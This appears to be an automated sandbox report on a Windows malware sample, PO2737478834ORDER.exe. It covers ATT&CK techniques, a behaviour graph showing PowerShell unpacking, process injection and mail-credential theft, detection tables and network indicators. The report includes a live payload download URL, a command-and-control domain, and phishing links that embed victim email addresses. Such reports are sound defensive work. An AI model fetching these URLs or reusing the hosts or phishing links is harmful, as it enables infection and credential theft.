          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494C20 sqlite3_bind_int,13_3_21494C20
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494CC0 sqlite3_bind_null,13_3_21494CC0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494CF0 sqlite3_bind_text,13_3_21494CF0
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494F70 sqlite3_bind_parameter_count,13_3_21494F70
          Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 13_3_21494FF0 sqlite3_bind_parameter_name,13_3_21494FF0
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Windows Management Instrumentation
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          11
          Deobfuscate/Decode Files or Information
          1
          OS Credential Dumping
          12
          System Time Discovery
          Remote Services1
          Archive Collected Data
          1
          Ingress Tool Transfer
          Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          Access Token Manipulation
          2
          Obfuscated Files or Information
          11
          Input Capture
          2
          File and Directory Discovery
          Remote Desktop Protocol1
          Data from Local System
          1
          Encrypted Channel
          Exfiltration Over Bluetooth1
          Endpoint Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Command and Scripting Interpreter
          Logon Script (Windows)112
          Process Injection
          1
          Software Packing
          Security Account Manager18
          System Information Discovery
          SMB/Windows Admin Shares1
          Email Collection
          1
          Non-Standard Port
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal Accounts2
          PowerShell
          Login HookLogin Hook1
          DLL Side-Loading
          NTDS211
          Security Software Discovery
          Distributed Component Object Model11
          Input Capture
          2
          Non-Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
          Masquerading
          LSA Secrets2
          Process Discovery
          SSH1
          Clipboard Data
          12
          Application Layer Protocol
          Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
          Virtualization/Sandbox Evasion
          Cached Domain Credentials21
          Virtualization/Sandbox Evasion
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          Access Token Manipulation
          DCSync1
          Application Window Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
          Process Injection
          Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Hidden Files and Directories
          /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          Hidden Users
          Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445942 Sample: PO2737478834ORDER.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 43 mad.pzg-peru.com 2->43 53 Snort IDS alert for network traffic 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 Antivirus detection for URL or domain 2->57 59 7 other signatures 2->59 8 PO2737478834ORDER.exe 40 2->8         started        signatures3 process4 file5 33 C:\Users\user\AppData\...\Habitters.Hej, ASCII 8->33 dropped 35 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->35 dropped 61 Suspicious powershell command line found 8->61 12 powershell.exe 20 8->12         started        signatures6 process7 file8 37 C:\Users\user\...\PO2737478834ORDER.exe, PE32 12->37 dropped 63 Obfuscated command line found 12->63 65 Writes to foreign memory regions 12->65 67 Found suspicious powershell code related to unpacking or dynamic code loading 12->67 69 Powershell drops PE file 12->69 16 wab.exe 3 18 12->16         started        21 conhost.exe 12->21         started        23 cmd.exe 1 12->23         started        signatures9 process10 dnsIp11 39 mad.pzg-peru.com 31.192.107.180, 56372, 78 NCONNECT-ASRU Russian Federation 16->39 41 72.11.156.201, 56371, 80 ASN-QUADRANET-GLOBALUS United States 16->41 25 C:\Users\user\AppData\...\vcruntime140.dll, PE32 16->25 dropped 27 C:\Users\user\AppData\Local\...\softokn3.dll, PE32 16->27 dropped 29 C:\Users\user\AppData\Local\Temp\nss3.dll, PE32 16->29 dropped 31 3 other files (none is malicious) 16->31 dropped 45 Contains functionality to hide user accounts 16->45 47 Tries to steal Mail credentials (via file / registry access) 16->47 49 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->49 51 3 other signatures 16->51 file12 signatures13

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          PO2737478834ORDER.exe13%ReversingLabs
          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\freebl3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\mozglue.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\msvcp140.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nss3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\nsxE304.tmp\nsExec.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\softokn3.dll0%ReversingLabs
          C:\Users\user\AppData\Local\Temp\vcruntime140.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Berni72\PO2737478834ORDER.exe13%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://www.mozilla.com/en-US/blocklist/0%URL Reputationsafe
          http://nsis.sf.net/NSIS_Error0%URL Reputationsafe
          http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
          https://aka.ms/pscore6lB0%URL Reputationsafe
          http://www.apache.org/licenses/LICENSE-2.0.html0%URL Reputationsafe
          http://x1.c.lencr.org/00%URL Reputationsafe
          http://x1.i.lencr.org/00%URL Reputationsafe
          http://ocsp.thawte.com00%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
          https://contoso.com/License0%URL Reputationsafe
          http://www.mozilla.com00%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
          http://nsis.sf.net/NSIS_ErrorError0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
          https://github.com/syohex/java-simple-mine-sweeperC:0%Avira URL Cloudsafe
          http://72.11.156.201/VyNLorvhdmohGewWLK21.bin0%Avira URL Cloudsafe
          https://github.com/Pester/Pester0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          mad.pzg-peru.com
          31.192.107.180
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://72.11.156.201/VyNLorvhdmohGewWLK21.binfalse
            • Avira URL Cloud: safe
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.mozilla.com/en-US/blocklist/wab.exe, 0000000D.00000003.1824178464.000000002195D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorPO2737478834ORDER.exe, PO2737478834ORDER.exe, 00000000.00000000.1217983560.000000000040A000.00000008.00000001.01000000.00000003.sdmp, PO2737478834ORDER.exe, 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.thawte.com/ThawteTimestampingCA.crl0wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmptrue
            • URL Reputation: malware
            unknown
            https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.1769578460.0000000005431000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://x1.c.lencr.org/0wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://x1.i.lencr.org/0wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://ocsp.thawte.com0wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/powershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crt.rootca1.amazontrust.com/rootca1.cer0?wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://www.mozilla.com0wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1839816921.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838834940.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838976416.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000002.00000002.1771992662.000000000649D000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://crl.rootca1.amazontrust.com/rootca1.crl0wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://ocsp.rootca1.amazontrust.com0:wab.exe, 0000000D.00000002.2491127179.0000000021E97000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://nsis.sf.net/NSIS_ErrorErrorPO2737478834ORDER.exe, 00000000.00000000.1217983560.000000000040A000.00000008.00000001.01000000.00000003.sdmp, PO2737478834ORDER.exe, 00000000.00000002.1267299542.000000000040A000.00000004.00000001.01000000.00000003.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/syohex/java-simple-mine-sweeperC:wab.exe, 0000000D.00000003.1784590605.0000000004F39000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1769578460.0000000005431000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://github.com/Pester/Pesterpowershell.exe, 00000002.00000002.1769578460.0000000005586000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            72.11.156.201
            unknownUnited States
            8100ASN-QUADRANET-GLOBALUSfalse
            31.192.107.180
            mad.pzg-peru.comRussian Federation
            49335NCONNECT-ASRUtrue
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1445942
            Start date and time:2024-05-22 20:07:08 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 9m 0s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:19
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:PO2737478834ORDER.exe
            Detection:MAL
            Classification:mal100.phis.troj.spyw.evad.winEXE@8/32@1/2
            EGA Information:
            • Successful, ratio: 33.3%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 82
            • Number of non-executed functions: 114
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 7852 because it is empty
            • Execution Graph export aborted for target wab.exe, PID 6536 because there are no executed function
            • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Not all processes where analyzed, report is missing behavior information
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • VT rate limit hit for: PO2737478834ORDER.exe
            TimeTypeDescription
            14:07:58API Interceptor42x Sleep call for process: powershell.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            72.11.156.201rORDER002838477624PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 72.11.156.201/qzHrlxbHdJh252.bin
            31.192.107.180rORDER002838477624PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              mad.pzg-peru.comrORDER002838477624PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 31.192.107.180
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              NCONNECT-ASRUrORDER002838477624PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 31.192.107.180
              https://atsginc.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23anastassiya.gainey@atsginc.comGet hashmaliciousHTMLPhisherBrowse
              • 158.255.2.72
              https://dish.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23audra.ritter@dish.comGet hashmaliciousHTMLPhisherBrowse
              • 158.255.2.72
              http://https:lcatterton.com@google.co.uk/%61%6D%70/%73/%F0%9F%84%B8%F0%9F%85%82.%E2%93%96%E2%93%93/zAtZ30%23amanda.materasso@lcatterton.comGet hashmaliciousHTMLPhisherBrowse
              • 158.255.2.72
              GCJlGRkySF.exeGet hashmaliciousSocks5SystemzBrowse
              • 91.218.114.177
              #U0420#U0430#U0445#U0443#U043d#U043e#U043a.pdf.exeGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
              • 185.70.104.90
              #U0420#U0430#U0445#U0443#U043d#U043e#U043a.pdf.exeGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
              • 185.70.104.90
              edoc.pdf.exeGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
              • 185.70.104.90
              3_#U0420#U0430#U0445#U0443#U043d#U043e#U043a.pdf.exeGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
              • 185.70.104.90
              CCleaner.exeGet hashmaliciousRMSRemoteAdmin, Remote UtilitiesBrowse
              • 185.70.104.112
              ASN-QUADRANET-GLOBALUSrORDER002838477624PO.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 72.11.156.201
              sF2s1EQU7T.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 64.188.21.131
              xerox322200524.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 167.160.166.205
              Plat#U0103 Factura MTL11852.xlsGet hashmaliciousRemcosBrowse
              • 23.226.128.138
              Plat#U0103 Factura MTL11852.xlsGet hashmaliciousUnknownBrowse
              • 23.226.128.138
              https://dianliangyingyu.com/Get hashmaliciousUnknownBrowse
              • 204.44.86.21
              file.exeGet hashmaliciousRemcos, GuLoaderBrowse
              • 64.188.27.90
              10#U041f.lnkGet hashmaliciousUnknownBrowse
              • 45.61.166.37
              Y6S9UtMNT1.elfGet hashmaliciousMiraiBrowse
              • 66.154.121.114
              CN-Invoice-0945413571-XXXXX6856-23120537357076000009.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
              • 104.247.165.99
              No context
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              C:\Users\user\AppData\Local\Temp\mozglue.dllYQR4CA11sP.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                jYHfnNP0MN.exeGet hashmaliciousAveMaria, Blank Grabber, PrivateLoader, UACMeBrowse
                  HAN HII PAYMENT-USD.docGet hashmaliciousAveMaria, PrivateLoaderBrowse
                    sample1.mp4.....................scr.exeGet hashmaliciousAveMaria, DBatLoader, PrivateLoaderBrowse
                      l8p4UP25ft.exeGet hashmaliciousAveMaria, GuLoader, PrivateLoaderBrowse
                        PO7431.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                          lcpXNQhTds.exeGet hashmaliciousAveMaria, PrivateLoader, PureLog Stealer, UACMeBrowse
                            diaHXS238I.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                              SAGcy7TqmW.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                frFUUDN8VV.exeGet hashmaliciousAveMaria, PrivateLoader, PureLog Stealer, UACMeBrowse
                                  C:\Users\user\AppData\Local\Temp\freebl3.dllYQR4CA11sP.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                    jYHfnNP0MN.exeGet hashmaliciousAveMaria, Blank Grabber, PrivateLoader, UACMeBrowse
                                      HAN HII PAYMENT-USD.docGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                        sample1.mp4.....................scr.exeGet hashmaliciousAveMaria, DBatLoader, PrivateLoaderBrowse
                                          l8p4UP25ft.exeGet hashmaliciousAveMaria, GuLoader, PrivateLoaderBrowse
                                            PO7431.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                              lcpXNQhTds.exeGet hashmaliciousAveMaria, PrivateLoader, PureLog Stealer, UACMeBrowse
                                                diaHXS238I.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                  SAGcy7TqmW.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                    frFUUDN8VV.exeGet hashmaliciousAveMaria, PrivateLoader, PureLog Stealer, UACMeBrowse
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:modified
                                                      Size (bytes):8003
                                                      Entropy (8bit):4.840877972214509
                                                      Encrypted:false
                                                      SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                      MD5:106D01F562D751E62B702803895E93E0
                                                      SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                      SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                      SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                      Malicious:false
                                                      Reputation:moderate, very likely benign file
                                                      Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):60
                                                      Entropy (8bit):4.038920595031593
                                                      Encrypted:false
                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                      Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):334288
                                                      Entropy (8bit):6.806904510927404
                                                      Encrypted:false
